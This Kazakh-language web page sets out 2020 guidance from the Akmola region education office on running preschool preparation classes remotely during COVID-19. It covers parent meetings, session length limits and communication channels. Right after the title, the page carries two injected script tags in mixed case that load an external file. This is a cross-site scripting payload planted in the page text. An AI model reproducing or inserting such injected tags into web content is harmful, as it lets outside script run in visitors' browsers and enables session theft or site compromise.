Білім беру ұйымдарындағы мектепке дейінгі дайындық топтары мен сыныптарын қашықтықтан оқытуға арналған Ақмола облысы білім беру басқармасы оқу-әдістемелік кабинетінің әдістемелік нұсқаулығы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
03.11.2020
- Оқушылар мен тәрбиеленушілердің, оқытушылардың, білім беру ұйымдарының басқа қызметкерлерінің өмірі мен денсаулығының қауіпсіздігін қамтамасыз ету, сондай-ақ COVID-19 коронавирустық инфекцияның таралуын болдырмау мақсатында білім беру ұйымдарында мектепке дейінгі дайындық ұйымдастырылған білім беру іс-шаралары қашықтықтан оқыту форматында жалғастырылсын.
- Оқу үдерісіне қатысушы барлық мұғалімдер, балалар мен ата-аналар үшін әдістемелік қолдауды ұйымдастыру, электрондық ақпарат көздерге, әлеуметтік желілер В контакте, Телеграммда топтар мен жеделхаттарға қол жетімділікті қамтамасыз ету;
3. Мектеп басшылары мұғалімдерге, оқушыларға, ата-аналарға (балалардың заңды өкілдеріне) қашықтықтан оқытуды ұйымдастыру бойынша барлық сұрақтарға қол жетімді байланыс түрлері білім беру ұйымдарының интернет-ресурстары арқылы бейнематериалдардың басталу күні мен уақытын көрсете отырып ақпарат беру;
4. Білім беру ұйымдарының әкімшілігі мен оқытушылар қашықтықтан оқытудың барлық қатысушыларымен келесі түсіндірме жұмыстарын жүргізсін:
- денсаулықты сақтау үшін әр адамның жауапкершілігі, сақтық шаралары туралы;
- ақпараттық-коммуникациялық технологияларды қолдана отырып, оқушылармен қашықтықтан жұмыс жасауды ұйымдастыру туралы;
- заңнамада белгіленген тәртіппен орта білім беру ұйымдарында қашықтықтан білім беру технологияларын қолдана отырып оқытуды жалғастыру.
- топтарға және мектепке дейінгі дайындық сыныптарына арналған сабақ кестесін бақылау, дүйсенбі мен жұманы қоса алғанда ұзақтығы 10 минутқа дейін;
- мектепке дейінгі білім беру топтары мен сыныптарының ата-аналарымен қашықтықтан ата-аналар жиналысын өткізу.
Мектепке дейінгі оқыту әдіскері М.Унгефуг